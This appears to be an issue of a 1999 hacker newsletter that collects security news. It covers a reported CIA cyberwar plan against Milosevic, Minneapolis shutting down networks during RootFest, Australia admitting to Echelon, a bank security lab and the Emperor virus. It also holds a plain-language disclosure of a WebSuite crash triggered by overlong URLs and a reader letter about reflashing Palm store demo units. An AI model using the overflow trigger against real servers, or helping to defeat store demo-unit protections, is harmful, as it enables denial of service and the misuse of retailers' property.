- ++ SMARTDESK WEBSUITE BUFFER OVERFLOW
-
- From HNS http://www.net-security.org/
-
- by BHZ, Thursday 27th May 1999 on 9.47 pm CET
- As posted on BugTraq by cmart: "WebSuite v2.1 will crash when an additional 250+
- characters is appended after the sites URL on NT Server 4 and NT Workstation 4
- boxes. Running on top of Windows 98 it will crash with 150+ characters appended
- after the sites URL. After reinstallating on both platforms several times, the overflow
- string length varied. Approximately 1 out of 8 times the overflow string went from 150
- chars (Win98) to about 1000+ chars. It also went from 250+ chars (NT) to about
- 2000+ chars".
-
- ++ GETTING ZAPPED FOR BETTER Z'S (TECH. 3:00 am)
- http://www.wired.com/news/news/email/explode-infobeat/technology/story/19713.html
-
- Relief is on the way for chronic snorers and their partners.
- A new therapy uses radio waves to treat the breathing
- disorder known as sleep apnea. By Kristen Philipkoski
-
- Mucho thanks to Spikeman for directing his efforts to our cause of bringing
- you the news we want to read about in a timely manner ... - Ed
-
- @HWA
-
- 01.2 MAILBAG - email and posts from the message board worthy of a read
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- Hacking the Palm Pilot demos...
-
-
- Date: Thu, 20 May 1999 23:56:05 -0400
- From: scosha@home.com
- Organization: @Home Network
- X-Mailer: Mozilla 4.51 [en]C-AtHome0404 (Win98; U)
- X-Accept-Language: en
- MIME-Version: 1.0
- To: hwa@press.usmc.net
- Subject: subject for newsleter
- Content-Type: text/plain; charset=us-ascii
- Content-Transfer-Encoding: 7bit
-
-
- As we all know 3Com has recently released the Palm IIIx and V.
-
-
- The Palm V demo in store displays is a dummy unit with a hunk of lead
- inside.
-
-
- On the other hand the Palm IIIx is a fully working unit. There is a
- trick to make it work 100%. Like it's predecesor the Palm III the demo,
- if you could get your hands on one was not hard to reflash the OS rom
- and presto you had a Palm III worth $500.00 and there was little effort
- involved.
-
-
- The IIIx poses a little more difficulty. They have employed a new
- strategy. 1st 3Com went with the new Ezball Motorola Dragon processor,
- and put the Os in static non volitile memory. While it's not hard to
- download a fresh copy of the OS from a real store bought IIIx, the trick
- is in flashing the demo unit. The programs used to flash the III does
- not work on the IIIx, all you will get is a 'wrong header card version'
- message, which basiclly seals your fate. I have been working on trying
- to flash the proper OS replacing the demo OS (which won't allow you to
- input anything) to no avail. I put it out to the people who do these
- things best. I know not what to do from here. I have a few insiders
- helping but it is a much kept secret.
-
-
- zzcrazyman
-
- ================================================================
-
- @HWA
-
-
- 02.0 From the editor.
- ~~~~~~~~~~~~~~~~
-
- #include <stdio.h>
- #include <thoughts.h>
- #include <backup.h>
-
- main()
- {
- printf ("Read commented source!\n\n");
-
- /*
- *Well things are moving along rather smoothly, its been a comparitively
- *slow (but interesting) week on the news front with some FBI action coming
- *down on people and shit, not a good time for hacker groups right now as
- *it looks like the crackdown is only going to get worse in the future.
- *
- *Anyway, drop into #hwa.hax0r.news the key is usually off and we're a
- *friendly bunch, stop by and chat about some of the stories here or that
- *you've seen elsewhere, other than that take it easy til next time...
- *
- *Here's #20, have at it...<snork, snork>
- */
- printf ("EoF.\n");
- }
-
-
- Congrats, thanks, articles, news submissions and kudos to us at the
- main address: hwa@press.usmc.net complaints and all nastygrams and
- mailbombs can go to /dev/nul nukes, synfloods and papasmurfs to
- 127.0.0.1, private mail to cruciphux@dok.org
-
- danke.
-
- C*:.
-
-
- @HWA
-
- 03.0 Clinton Authorizes Cyber Attack???
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- contributed by Sangfroid
- Reuters and Wired Online articles are referencing a print
- story in Newsweek that claims that President Clinton
- has authorized a "top-secret" plan against Slobodan
- Milosevic. One part of this plan would use "computer
- hackers" to attack his foreign bank accounts. Reuters
- also claimed that Newsweek said that the report
- instructed the CIA to wage "cyberwar" against Milosevic.
-
- Now there are still a few questions that are not
- answered in this news article. If the report was so
- top-secret how did NewsWeek learn of it? Won't other
- countries be rather upset when we "hack" into their
- banks? And aren't his bank accounts frozen anyway, so
- what is the point of breaking in? News week even
- admits that it does not have access to the original
- report. Once again until we see confirmation HNN will
- treat this story as extremely suspect.
-
- Newsweek
- http://www.newsweek.com/nw-srv/printed/us/in/in0922_1.htm
- Reuters- Via Yahoo
- http://dailynews.yahoo.com/headlines/ts/story.html?s=v/nm/19990523/ts/yugoslavia_usa_cyberwar_2.html
-
- Wired
- http://www.wired.com/news/news/politics/story/19836.html
-
-
- Newsweek
-
- EXCLUSIVE
-
- Cyberwar and Sabotage
-
- President Clinton has OK'd a top-secret plan to destabilize
- Milosevicùand go after his money
-
- By Gregory L. Vistica
-
- Covert action is seductive to policymakers in a bind. When diplomacy fails
- and force falls short, presidents often turn to the CIA for secret solutions
- to vexing problems. Unable to make the air war against Serbian leader
- Slobodan Milosevic effective, and unwilling to invade with ground troops,
- President Clinton has decided to try a clandestine third way. Earlier this
- month national-security adviser Sandy Berger presented Clinton with a
- covert plan to squeeze Milosevic.
-
- The president liked the idea. Senior intelligence officials tell NEWSWEEK
- that last week Clinton issued a "finding," a highly classified document
- authorizing the spy agency to begin secret efforts "to find other ways to get
- at Milosevic," in the words of one official. Two weeks ago Berger secretly
- briefed members of the House and Senate Intelligence committees about
- the details of the two-part plan. According to sources who have read the
- finding, the CIA will train Kosovar rebels in sabotageùage-old tricks like
- cutting telephone lines, blowing up buildings, fouling gasoline reserves and
- pilfering food suppliesùin an effort to undermine public support for the
- Serbian leader and damage Yugoslav targets that can't be reached from
- the air. That much is unsurprising. But the CIA has also been instructed to
- conduct a cyberwar against Milosevic, using government hackers to tap
- into foreign banks and, in the words of one U.S. official, "diddle with
- Milosevic's bank accounts."
-
- The finding was immediately criticized by some lawmakers who
- questioned the wisdomùand legalityùof launching a risky covert action
- that, if discovered, could prolong the war, alienate other NATO
- countriesùand possibly blow back on the United States. Under the
- finding, the allies were to be kept in the dark about the plan. Other
- members of Congress privy to the finding wondered about its timing. Why
- did Clinton authorize the operation just as diplomats had begun making
- progress on a peace agreement? The White House declined to comment
- on the finding, and NEWSWEEK does not have access to the entire
- document. But some intelligence officials with knowledge of its contents
- worry that the finding was put together too hastily, and that the potential
- consequences haven't been fully thought out. "If they pull it off, it will be
- great," says one government cyberwar expert. "If they screw it up, they
- are going to be in a world of trouble."
-
- By far the most controversialùand probably most difficultùpart of the
- operation would be the effort to hack into Milosevic's foreign bank
- accounts. Intelligence sources believe they have identified banks in several
- countries, including Russia, Greece and Cyprus, where the Serb leader has
- hidden millions of dollars. But the Hollywood vision of a brainy nerd
- draining bank accounts from his computer at CIA headquarters is a
- fantasy. According to government intelligence experts, agents would have
- to visit each of the banks, set up new accounts, then carefully watch how
- the institution operates and look for weak links in its security. The National
- Security Agency's hackers would use that information to try to overcome
- today's sophisticated encryption software and fire walls. If they gained
- access, the hackers could do almost anything they liked with Milosevic's
- cashùsteal it, move it to a dummy account or slowly drain it away a few
- thousand dollars at a time.
-
- But should they? The idea of a U.S.-sponsored plan to break into foreign
- banks unnerves some intelligence officials, who point out that the operation
- would be a breach of national sovereignty in friendly countries and open
- the door to computer attacks on U.S. banks. What's more, the United
- States would be the main loser if confidence in the world banking system
- were undermined.
-
- The sabotage plan also entails some serious problems. The CIA would
- somehow have to find and train guerrillas without helping the Kosovo
- Liberation Army, which the administration itself labeled a terrorist
- organization just a year ago and which is believed to fund its operations
- with profits from international drug smuggling. In the chaos now prevailing
- in Kosovar refugee camps it will not be easy for the CIA to make sure the
- anti-Milosevic rebels it signs up have no KLA ties. Intelligence officials
- also worry it would be difficult to control the U.S.-trained rebels once
- boot camp is over and they are set loose on Milosevic. "I'm afraid they
- could use their training to carry out atrocities," says John Rothrock, the Air
- Force's former chief of intelligence planning. "If they think they can rein
- them in, it's tremendous naivetΘ."
-
- Congress can complain all it likes, but it has no legal authority to stop the
- finding. Lawmakers can try to block the plan by refusing to provide money
- for the covert action, but the president can tap into his emergency funds to
- finance it. At this point, it is not at all certain that the finding will ultimately
- be carried out. If the grumblings from the Hill and the intelligence
- community grow too loud, or if the risk-averse CIA chooses to drag its
- feet, the president may opt to quietly kill the findingùand pretend it never
- existed.
-
- Newsweek, May 31, 1999
-
- @HWA
-
- 03.1 More on the Cyberwar
- ~~~~~~~~~~~~~~~~~~~~
-
- Contributed by Twstdpair (Source: MSNBC)
-
- Cyberwar? The U.S. stands to lose
- Experts argue plan to raid Milosevic's bank accounts would do more harm
- than good
-
- May 28 - It sounded like a TomClancy spy novel.Newsweekreported last week
- that the CIAwas planning to tinker withinternational bank accounts fullof Slobodan
- Milosevic's money -just another way of getting under the Yugoslav president's skin.
- Information warfare experts disagree about the feasibility of such a cyberattack. But
- there's little disagreement the U.S. stands to lose much more than itmight gain from
- firing the firstvolley in such an infomation war.In fact, some believe damage has
- already been done.
-
- THE NEWSWEEK STORY RAISED several issues: What international lawswould govern a
- U.S.-backed attack ona bank in a third-party nation? Is suchan attack feasible in the
- first place? What kind of retaliation might U.S.citizens, and their bank accounts,
- face? But most important, what does even the possibility of such an attack do to the
- integrity of international banking systems? The story on the cyberattack - fact, fiction
- or somewhere in between - could already have put the U.S. at risk,said Kawika M. Dajuio,
- executive vice president of the Financial Information Protection Association.
-
- Banking systems hinge on public confidence. You put the money in; you're confident you'll
- be able to take the money out. If there's any hint you might not be able to get at your
- money, you'd withdraw it. Any attack on the integrity of a banking system anywhere -
- particularly when retaliation seems like such an obvious possibility - chips away at
- public confidence. "It bothers me because we have had conversations with the defense and
- intelligence community. We thought this was off the table," Dajuio said. "We've had
- discussions with rather senior policy-makers. We thought they understood the importance
- of protecting public confidence in the payment system." But retaliation by foreign agents
- might be just one source of insecurity for U.S. account holders. There's another: If the
- government can and is willing to tinker with foreign accounts, what will stop it from
- tinkering with mine?
-
- COULD IT BE DONE? Could U.S. agents hijack Milosevic's money, allegedly stashed away in
- foreign banks? Yes and no. Experts agree that the CIA has had the know-how to control
- bank accounts for years, through old- fashioned non-cyber methods, such as coercing bank
- authorities, or even through legal methods such as freezing accounts. On the other hand,
- it's not easy when the target knowns what's coming. According to MSNBC analyst Bill Arkin,
- the international community, including UNSCOM, is still trying to get its hands on Saddam
- Hussein's assets. And such real-world tactics are a far cry from the cyberwar image of a
- few CIA hackers sitting at a keyboard moving around money thanks to an Internet connection
- and some wits. There's disagreement about how possible that might be. "The audits we have
- performed tell us [banks] are not invulnerable," says a security expert identifying himself
- as Space Rogue. Rogue works at L0pht Heavy Industries, which hires out to hack corporate
- computer systems to test their vulnerability. "Banks have a little more security in place,
- but that security is still not at a level where it's unbreakable." While money systems aren't
- connected to the public Internet, "sometimes they have a modem dangling off for remote access,
- or they use cryptography, but not correctly," he said. Others suggest cracking a bank that
- holds Milosevic money - outside the more traditional methods - is nearly impossible. "I deal
- in probabilities, and I've never seen it," said a man identifying himself as Louis Cipher, a
- principal investor in Infowar.com. Cipher is also in charge of security at what he says is the
- "sixth-largest brokerage in America." He suggested very few individuals have the skills
- necessary to "tunnel" from an Internet connection through mainframe systems in banks - in
- fact, a team of specialists and inside information would be required."You'd have to be an
- applications specialist to even navigate to a screen," he said. "You're talking well beyond
- the skills of hackers. It would have to be an insider working with Job Control Language
- sitting on the mainframe. The only one who would have that ability other than the U.S.
- government would be organized crime." And Cipher is skeptical about the U.S. government's
- ability to hire and hold the brightest minds in the security industry - since no government
- agency can match the lure of stock options offered by a high-tech firm. Still, even the
- possibility of the U.S. using a wired computer to move Milosevic's money drew swift reaction
- from information warfare observers. Even hacker groups protested the notion, with a hacker
- calling himself "sixtoed" setting up a Web page in protest. The reason: Since the U.S. relies
- more on technology and information than any other nation, it stands to lose the most from such
- a cyberwar. "I am not one for an information arms race," said Frank Cilluffo, senior analyst at
- the Center for Strategic and International Studies in Washington. "We will lose that race....
- We're a hell of a lot more susceptible to retaliation. The defensive implications outweigh the
- offensive implications." Anyone can build up an information
- warfare capability, Cilluffo said. And it's much more like guerrilla war than nuclear war - it's
- easy for the enemy to hide, and there's no real deterrent. Therefore, retaliation could be swift
- and indiscriminate. In addition, there is a general principle among security experts suggesting
- once a system's security is compromised, it's much easier to compromise a second time. So the U.S.
- could very well be paving the way for retribution.
-
- WHY NO DENIALS? Fear of such retaliation attempts, or even the perception of such retaliation
- attempts, drove Dajuio to start calling his friends on the intelligence community to complain
- as soon as the Newsweek story hit. He has yet to receive the reassurance he was hoping for.
- "If it's true or it's just leaks, it's bad to have the story out there," Dajuio said. "I have yet
- to have anyone tell me 'Don't worry, everything's OK.' ... If they haven't done anything, the
- most appropriate thing to do is to come out and say they're not doing it."
- The CIA isn't doing that; a spokesperson told MSNBC the agency couldn't comment on its activities,
- but one source familiar with U.S. intelligence capabilities tells MSNBC to be "very skeptical" of the
- Newsweek story. Meanwhile, opening the Pandora's box of cyberwar would lead to a
- series of yet-to-be answered questions. International law isn't ready to handle such conflicts, says
- Cilluffo - so if the U.S. broke into a bank in Cyprus, what laws would govern that act? And could the
- compromised bank sue the U.S. government? "What are the rules of engagement
- here?" Cilluffo asked. "What is game, what is not game? This may be a harbinger of how we prosecute and
- wage war in the future."
-
- @HWA
-
- 04.0 RootFest Scares Officials In Minneapolis
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- From HNN http://www.hackernews.com/
-
- contributed by erewhon
- The hacker convention RootFest was held in Minneapolis
- over the weekend. Evidently this scared the local
- authorities enough to shut down several vulnerable
- points in its computer network. The city respond to the
- three day hacker convention by shutting down some
- older dial-up modem lines. (Wonder if they will come
- back online afterwards?) Other reports also indicate
- that the Minneapolis City Police also shut down its
- computer network over the weekend.
-
- APB Online
- http://www.apbonline.com/911/1999/05/21/hackers0521_01.html
-
- WCCO Channel 4
- http://www.wcco.com/news/stories/news-990521-184737.html
-
- RootFest
- http://www.rootfest.org
-
- City of Minneapolis Action Plan
- http://www.rootfest.org/Press/park.txt
-
- APB Online:
-
- HACKERS WORRY MINNEAPOLIS OFFICIALS
- City Secures Its Computers as Conference Comes to Town
-
- May 21, 1999
-
- By Hans H. Chen
-
- MINNEAPOLIS (APBNews.com) -- The arrival of several hundred
- computer hackers this weekend has prompted the city to shut down
- several vulnerable points in its computer network.
-
- While the city's computer guru called the weekend shutdown "an
- opportunity to remind ourselves of network-based security," the
- conference organizer called the measures "an overly paranoid
- precaution."
-
- The hackers descended today on the Minneapolis Convention Center for
- RootFest 99, a three-day discussion of computer security open to "the
- computer underground, hackers, IT professionals, government agents,
- feds," according to the conference's Web site.
-
- The conference features sessions entitled "Circumventing Internet
- Censorship," and "Internet Security in Europe: State of Affairs."
- Speakers include both hackers and computer security consultants
-
- City downplays concerns
-
- But the city responded to the event by closing off some older dial-up
- modem lines that a few telecommuting employees and remote city
- agencies still use to connect into the city's network.
-
- Don Saelens, the city's information technology manager, downplayed
- concerns about possible hacking attempts.
-
- The conference, Saelens said, presented "an opportunity to remind
- ourselves of network-based security."
-
- But Saelens did admit that the timing of the system shutdown was not
- wholly coincidental.
-
- "We've been doing a number of upgrades on our own networks, and
- these were all slated to go out anyway this year," Saelens said. "I have
- to admit, [this conference] was a reminder of network security that
- heightened the awareness."
-
- Police reportedly shut down
-
- In addition, the Minneapolis Star Tribune reported that the city Police
- Department shut down its computer network over the weekend. Saelens
- and a police official refused to confirm the report, citing safety
- concerns.
-
- "The only thing the police is saying is we are not releasing anything we
- are doing for security reasons," said Penny Parrish, a police
- department spokeswoman.
-
- 'Hacker threat'?
-
- Chris Lothos, an organizer of RootFest, attacked the city's measures in
- a dispatch on the RootFest Web site.
-
- "It's an overly paranoid precaution taken for the 'hacker threat' that
- RootFest supposedly poses to the world at large," Lothos wrote.
-
- The conference also printed on its Web site a copy of the e-mail memo
- Saelens sent to city employees alerting them to the security measures.
- Saelens said he's not sure how the group got a copy of his e-mail.
-
-
- >Subject: FW: NOTICE TO ALL PARK BOARD COMPUTER USERS regarding Hacker
- >Conference this weekend
- >Importance: High
- >
- >Minneapolis Park and Recreation ITS Hacker conference action plan:
- >
- > In response to the City's action plan noted below, Park Board ITS
- >will be disabling the Park Board's Email services Friday evening, May 21st
- >through Monday morning, May 24th. Park Board users will not have access
- >at all to their Park Board Email accounts during this time.
- >
- >In addition - Dial-In (Reachout) services will be disabled Thursday
- >evening, May 20th beginning at 8:00pm through Monday morning, May 24th.
- >The Minneapolis rec centers and other remote users will not be able to
- >access their Reachout accounts during this time. Remote PEIRS users
- >entering time are advised to do so by Thursday evening, May 20th by
- >8:00pm.
- >PEIRS users downtown, at the SSSC, or on frame-relay (golf courses) will
- >be able to enter in time as usual.
- >
- >If you have questions, please contact the Park Board Help Desk at
- >661-XXXX. Thank you for your cooperation.
- >
- >Larry Brandts
- >Park Board ITS Manager
- >
- >
- >-----Original Message-----
- >From: XXXXXXXXXXX Sent: Wednesday, May 19, 1999 10:35 AM
- >To: All Exchange Users
- >Subject: NOTICE TO ALL CITY COMPUTER USERS
- >
- >To all City Staff,
- >RootFest '99, a convention of so-called computer "hackers" will be meeting
- >in Minneapolis this weekend, May 21-23. You may have read news stories
- >about individuals (hackers) who have used their computer programming
- >skills to gain unauthorized access (hack) into computer networks of
- >government agencies, businesses, banks, or other high-profile
- >organizations. Sometimes, these individuals hack into computers to
- >perform fairly harmless computer pranks. However, that is not always the
- >case. Hackers can also infect entire computer networks with disabling
- >viruses.
- >
- >As a precautionary measure, we are reminding you of safe computing
- >practices that should already be followed, as well as some additional
- >steps we will be taking to protect the City from any unauthorized access
- >to our network. To be successful, we will need the active participation
- >of all City staff.
- >
- >1. Employees must turn off their computer terminals at the close of
- >business each night.
- >
- >2. Those who have an individual analog phone line and modem should be
- >turning off the modem every night. There are very few of these individual
- >analog lines and modems left in the City, and they are being phased out
- >because of their risk to network security. Anyone who has one of the new
- >City image pc's does not have worry about this issue, as they are using
- >the new City standard for remote access. If you have not had a line/modem
- >installed, you do not need to do anything except turn off your pc.
- >
- >3. Employees will not have access to their City email accounts at all
- >beginning Friday evening through Monday morning. There will not be access
- >to email outside of the City from Thursday evening through Monday morning.
- >
- >4. Access to the City's network from outside locations will be
- >temporarily cancelled Thursday evening through Monday morning. This will
- >not impact the majority of staff members, but as an example, if you can
- >currently check your City email account from home, you will not be able to
- >do so during that timeframe.
- >
- >Employees who will be at work over the weekend will have access to Insite,
- >the City's intranet, as well as the Internet.
- > While I do not believe the City will be a target for these individuals,
- >it
- >is a prudent business decision to follow these simple safety precautions.
- >If you have questions regarding any of these steps, please contact Wanda
- >Forsythe, in ITS Security. Her number is 673-XXXX.
- >
- >Thank you for your attention to this matter.
- >
- >- Don Saelens
- >* * * * * * * Sara Dietrich, Communications Department
- >673-XXX; 673-XXXX (fax)
-
- @HWA
-
- 05.0 Australia Admits to Echelon
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- from HNN http://www.hackernews.com/
-
- contributed by erewhon
- Martin Brady, director of the Defense Signals Directorate
- in Canberra Austrailia has admitted that his country
- does participate in a secret spy organization known as
- UKUSA. This organization works with the intelligence
- agencies of Australia, Canada, New Zealand, the UK and
- the USA to intercept every fax, telex, e-mail, phone
- call, or computer data that is carried via commercial
- satellite communications. This global eavesdropping is
- known as Echelon
-
- The Age
- http://www.theage.com.au/daily/990523/news/news3.html
-
- The Age;
-
- Careful, they might hear you
-
- By DUNCAN CAMPBELL
-
- Australia has become the first country openly to admit that it
- takes part in a global electronic surveillance system that
- intercepts the private and commercial international
- communications of citizens and companies from its own and
- other countries. The disclosure is made today in Channel 9's
- Sunday program by Martin Brady, director of the Defence
- Signals Directorate in Canberra.
-
- Mr Brady's decision to break ranks and officially admit the
- existence of a hitherto unacknowledged spying organisation
- called UKUSA is likely to irritate his British and American
- counterparts, who have spent the past 50 years trying to prevent
- their own citizens from learning anything about them or their
- business of ``signals intelligence'' - ``sigint'' for short.
-
- In his letter to Channel 9 published today, Mr Brady states that
- the Defence Signals Directorate (DSD) ``does cooperate with
- counterpart signals intelligence organisations overseas under the
- UKUSA relationship".
-
- In other statements which have now been made publicly
- available on the Internet (www.dsd.gov.au), he also says that
- DSD's purpose ``is to support Australian Government
- decision-makers and the Australian Defence Force with
- high-quality foreign signals intelligence products and services.
- DSD (provides) important information that is not available from
- open sources".
-
- Together with the giant American National Security Agency
- (NSA) and its Canadian, British, and New Zealand
- counterparts, DSD operates a network of giant, highly
- automated tracking stations that illicitly pick up commercial
- satellite communications and examine every fax, telex, e-mail,
- phone call, or computer data message that the satellites carry.
-
- The five signals intelligence agencies form the UKUSA pact.
- They are bound together by a secret agreement signed in 1947
- or 1948. Although its precise terms have never been revealed,
- the UKUSA agreement provides for sharing facilities, staff,
- methods, tasks and product between the participating
- governments.
-
- Now, due to a fast-growing UKUSA system called Echelon,
- millions of messages are automatically intercepted every hour,
- and checked according to criteria supplied by intelligence
- agencies and governments in all five UKUSA countries. The
- intercepted signals are passed through a computer system called
- the Dictionary, which checks each new message or call against
- thousands of ``collection'' requirements. The Dictionaries then
- send the messages into the spy agencies' equivalent of the
- Internet, making them accessible all over the world.
-
- Australia's main contribution to this system is an ultra-modern
- intelligence base at Kojarena, near Geraldton in Western
- Australia. The station was built in the early 1990s. At Kojarena,
- four satellite tracking dishes intercept Indian and Pacific Ocean
- communications satellites. The exact target of each dish is
- concealed by placing them inside golfball like ``radomes''.
-
- About 80 per cent of the messages intercepted at Kojarena are
- sent automatically from its Dictionary computer to the CIA or
- the NSA, without ever being seen or read in Australia. Although
- it is under Australian command, the station - like its controversial
- counterpart at Pine Gap - employs American and British staff in
- key posts.
-
- Among the ``collection requirements" that the Kojarena
- Dictionary is told to look for are North Korean economic,
- diplomatic and military messages and data, Japanese trade
- ministry plans, and Pakistani developments in nuclear weapons
- technology and testing. In return, Australia can ask for
- information collected at other Echelon stations to be sent to
- Canberra.
-
- A second and larger, although not so technologically
- sophisticated DSD satellite station, has been built at Shoal Bay,
- Northern Territory. At Shoal Bay, nine satellite tracking dishes
- are locked into regional communications satellites, including
- systems covering Indonesia and south-west Asia.
-
- International and governmental concern about the UKUSA
- Echelon system has grown dramatically since 1996, when New
- Zealand writer Nicky Hager revealed intimate details of how it
- operated. New Zealand runs an Echelon satellite interception
- site at Waihopai, near Blenheim, South Island. Codenamed
- ``Flintlock", the Waihopai station is half the size of Kojarena and
- its sister NSA base at Yakima, Washington, which also covers
- Pacific rim states. Waihopai's task is to monitor two Pacific
- communications satellites, and intercept all communications from
- and between the South Pacific islands.
-
- Like other Echelon stations, the Waihopai installation is
- protected by electrified fences, intruder detectors and infra-red
- cameras. A year after publishing his book, Hager and New
- Zealand TV reporter John Campbell mounted a daring raid on
- Waihopai, carrying a TV camera and a stepladder. From open,
- high windows, they then filmed into and inside its operations
- centre.
-
- They were astonished to see that it operated completely
- automatically.
-
- Although Australia's DSD does not use the term ``Echelon'',
- Government sources have confirmed to Channel 9 that Hager's
- description of the system is correct, and that the Australia's
- Dictionary computer at Kojarena works in the same way as the
- one in New Zealand.
-
- Until this year, the US Government has tried to ignore the row
- over Echelon by refusing to admit its existence. The Australian
- disclosures today make this position untenable. US intelligence
- writer Dr Jeff Richelson has also obtained documents under the
- US Freedom of Information Act, showing that a US Navy-run
- satellite receiving station at Sugar Grove, West Virginia, is an
- Echelon site, and that it collects intelligence from civilian
- satellites.
-
- The station, south-west of Washington, lies in a remote area of
- the Shenandoah Mountains. According to the released US
- documents, the station's job is ``to maintain and operate an
- Echelon site''. Other Echelon stations are at Sabana Seca,
- Puerto Rico, Leitrim, Canada and at Morwenstow and London
- in Britain.
-
- Information is also fed into the Echelon system from taps on the
- Internet, and by means of monitoring pods which are placed on
- undersea cables. Since 1971, the US has used specially
- converted nuclear submarines to attach tapping pods to deep
- underwater cables around the world.
-
- The Australian Government's decision to be open about the
- UKUSA pact and the Echelon spy system has been motivated
- partly by the need to respond to the growing international
- concern about economic intelligence gathering, and partly by
- DSD's desire to reassure Australians that its domestic spying
- activity is strictly limited and tightly supervised.
-
- According to DSD director Martin Brady, ``to ensure that (our)
- activities do not impinge on the privacy of Australians, DSD
- operates under a detailed classified directive approved by
- Cabinet and known as the Rules on Sigint and Australian
- Persons".
-
- Compliance with this Cabinet directive is monitored by the
- inspector-general of security and intelligence, Mr Bill Blick. He
- says that ``Australian citizens can complain to my office about
- the actions of DSD. And if they do so then I have the right to
- conduct an inquiry."
-
- But the Cabinet has ruled that Australians' international calls,
- faxes or e-mails can be monitored by NSA or DSD in specified
- circumstances. These include ``the commission of a serious
- criminal offence; a threat to the life or safety of an Australian; or
- where an Australian is acting as the agent of a foreign power".
- Mr Brady says that he must be given specific approval in every
- case. But deliberate interception of domestic calls in Australia
- should be left to the police or ASIO.
-
- Mr Brady claims that other UKUSA nations have to follow
- Australia's lead, and not record their communications unless
- Australia has decided that this is required. ``Both DSD and its
- counterparts operate internal procedures to satisfy themselves
- that their national interests and policies are respected by the
- others," he says.
-
- So if NSA happens to intercept a message from an Australian
- citizen or company whom DSD has decided to leave alone, they
- are supposed to strike out the name and insert ``Australian
- national'' or ``Australian corporation'' instead. Or they must
- destroy the intercept.
-
- That's the theory, but specialists differ. According to Mr Hager,
- junior members of UKUSA just can't say ``no''. ``... When
- you're a junior ally like Australia or New Zealand, you never
- refuse what they ask for.''
-
- There are also worries about what allies might get up to with
- information that Australia gives them. When Britain was trying to
- see through its highly controversial deal to sell Hawk fighters and
- other arms to Indonesia, staff at the Office of National
- Assessments feared that the British would pass DSD intelligence
- on East Timor to President Soeharto in order to win the lucrative
- contract.
-
- The Australian Government does not deny that DSD and its
- UKUSA partners are told to collect economic and commercial
- intelligence. Australia, like the US, thinks this is especially
- justified if other countries or their exporters are perceived to be
- behaving unfairly. Britain recognises no restraint on economic
- intelligence gathering. Neither does France.
-
- According to the former Canadian agent Mike Frost, it would
- be ``nave" for Australians to think that the Americans were not
- exploiting stations like Kojarena for economic intelligence
- purposes. ``They have been doing it for years," he says. ``Now
- that the Cold War is over, the focus is towards economic
- intelligence. Never ever over-exaggerate the power that these
- organisations have to abuse a system such as Echelon. Don't
- think it can't happen in Australia. It does.''
-
- @HWA
-
- 06.0 Banks to Test Home User PC Security
- ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
-
- from HNN http://www.hackernews.com/
-
- contributed by Weld Pond
- Worried that consumers PCs may be vulnerable to
- attack a consortium of the 15 largest US banks plan to
- open a lab to test PC Hardware and software. The
- Banking Industry Technology Secretariat, plan to open
- the lab this summer. (Its about time they started
- looking into this. Applications like Back Orifice have been
- around for what? over a year now? Sounds like someone
- is just covering their ass.)
-
- C|Net
- http://www.news.com/News/Item/0,4,0-36923,00.html?st.ne.ni.lh
-
- Big banks move on Net security
- By Tim Clark
- Staff Writer, CNET News.com
- May 21, 1999, 1:00 p.m. PT
-
- Worried that problems on home computers may make Internet banking insecure, a
- group of major U.S. banks is expected to unveil a plan this summer to open a lab
- to test the security of Web browsers and PC hardware and software.
-
- "The banks feel that firewalls and what they have internally is in great shape, but the link is
- to the consumer and PC environments [where they find security more suspect]," said
- Catherine Allen, chief executive of the Banking Industry Technology Secretariat, a division
- of Bankers Roundtable.
-
- BITS is governed by a board of CEOs of the 15 largest U.S. banks, including familiar
- names like Citibank, Chase Manhattan, Mellon Bank, Wells Fargo, and Bank of America.
- Edward Crutchfield, First Union chief executive, chairs BITS, a two-year-old group that
- focuses on technology issues affecting the U.S. banking system.
-
- The BITS Security/Technology Lab, to be run by a new banking-oriented division of
- government contractor SAIC, is due to be announced in late June or early July, with vice
- president Al Gore and former U.S. Sen. Sam Nunn invited to speak. A July meeting is
- planned in the San Francisco area to explain the program to hardware and software
- vendors.
-
- Security experts from major banks are currently drafting the testing criteria. In addition, the
- lab oversight group is working with the President's Commission on Critical Infrastructure
- Protection on ways to protect the nation's financial infrastructure from attacks by terrorist
- or organized criminal groups. President Clinton formed that group a year ago after a report
- on threats from cyber-terrorists.
-
- The effort also will involve information sharing among banks to ward off organized attacks,
- including use of neural networking and other technologies to detect and predict patterns of
- attacks.
-
- "If it's a terrorist or major criminal activity, we think it will happen in multiple places," Allen
- said. "They won't hit just one bank but many." Security planners worry that assaults could
- be mounted near the end of this year, when attackers hope banks might be distracted by
- the Y2K turnover.
-
- The testing of consumer devices and software will be coupled with educational campaigns
- urging users to utilize antivirus software and take other precautions to avoid security
- problems.
-
- Systems that pass the tests can use a special logo in their marketing to signify the
- products have been deemed safe by BITS. Also to be tested are systems to conduct
- financial transactions, including personal financial software, online billing and bill-paying
- packages, and smart cards.
-
- "Vendors want this as much as we do," Allen contended, saying that today vendors may
- get multiple requests from different banks to make specific changes for that bank's use.
- Funneling through the BITS lab would simplify that process.
-
- The effort comes as financial institutions are beginning to use the Internet for online
- banking, stock trading, and other transactions. In the past, online consumer transactions
- have been routed over private networks that banks regard as more secure. But the
- explosion of the Internet, which is not such a controlled or secure environment, has
- bankers looking for safety.
-
- Another reflection of that concern has been the efforts by Visa and MasterCard, on the
- behalf of their bank-owners, to push the Secure Electronic Transactions (SET) protocol for
- Internet credit card purchases. Although SET has not been widely adopted in the U.S., the
- prolonged push to implement it mirrors bankers' worries about their reputation as trusted
- institutions.
-
- But there's a financial implication too. Banks are heavily regulated, and they are required to
- reimburse their customers for any losses suffered because of security breaches in online
- financial transactions. As online banking grows, that could become a big liability.
-
-
- @HWA
-
- 07.0 EMPEROR VIRUS
- ~~~~~~~~~~~~~
-
- From http://www.net-security.org/
-
- by BHZ, Tuesday 25th May 1999 on 4.46 pm CET
- AVP announced new clone of the Cheronobyl virus named Emperor. The Emperor
- virus has additional technology to infect more systems by copying itself to more
- areas of the computer and has the possibility to travel further. It infects DOS (16-bit)
- COM and EXE programs and overwrites the Master Boot Record of the hard drive and
- boot sector on floppy diskettes.
-
